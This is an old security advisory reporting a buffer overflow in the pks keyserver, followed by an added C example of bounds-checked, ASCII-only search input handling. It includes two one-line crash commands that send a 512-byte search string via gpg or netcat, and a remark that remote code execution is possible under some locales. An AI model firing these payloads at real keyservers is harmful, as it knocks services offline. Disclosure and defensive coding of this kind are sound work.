

30th May 2002 [SBWID-5378]
COMMAND
	pks buffer overflow
SYSTEMS AFFECTED
	current version
PROBLEM
	Max [rusmir@tula.net] posted the following:
	
	A popular pks public key server available from
	http://www.mit.edu/people/marc/pks/pks.html is vulnerable to a buffer
	overflow attack.
	
	A long enough (> 256b) search request will crash the service.
	
	It is as simple as this:
	
	
	gpg --search-keys `perl -e "print 'A'x512"`
	
	
	or, without gpg,
	
	
	echo -e "GET /pks/lookup?op=index&search=`perl -e "print 'A'x512"`" | nc keyserver-host 11371
	
	
	Fortunately (or unfortunately) in order to exploit remote execution,
	the code should be an isalnum() string and should be able to survive
	tolower() conversion. But it is possible to write, especially for
	systems with locales where 0x80..0xff are printable characters.
SOLUTION
	Nothing yet.
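
	An added example, not part of the original advisory and not pks code:
	one way a server can take in a search word without the overflow, by
	checking the length before copying and by classifying bytes as ASCII
	only, so the result does not change with the locale. The helper name
	normalize_search, the 256-byte limit (taken from the threshold reported
	above) and the single alphanumeric word as input are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limit: the advisory reports crashes for search strings over 256 bytes. */
#define SEARCH_MAX 256

/* ASCII-only classification: unlike isalnum()/tolower(), the result does not
 * change with the process locale, so bytes 0x80..0xff are never accepted. */
static int ascii_alnum(unsigned char c)
{
    return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') ||
           (c >= 'A' && c <= 'Z');
}

static unsigned char ascii_lower(unsigned char c)
{
    return (c >= 'A' && c <= 'Z') ? (unsigned char)(c + ('a' - 'A')) : c;
}

/*
 * Hypothetical helper: copy one search word into out[outlen], lowercased.
 * Returns the word length, or -1 if the word is empty, longer than
 * SEARCH_MAX, too long for the buffer, or holds a byte outside [0-9A-Za-z].
 * On failure out is an empty string; input is rejected, never truncated.
 */
long normalize_search(const char *in, char *out, size_t outlen)
{
    size_t i, n;

    if (in == NULL || out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';

    /* Measure with an upper bound before writing any input byte. */
    for (n = 0; n <= SEARCH_MAX && in[n] != '\0'; n++)
        ;
    if (n == 0 || n > SEARCH_MAX || n >= outlen)
        return -1;

    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)in[i];
        if (!ascii_alnum(c)) {
            out[0] = '\0';
            return -1;
        }
        out[i] = (char)ascii_lower(c);
    }
    out[n] = '\0';
    return (long)n;
}
```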
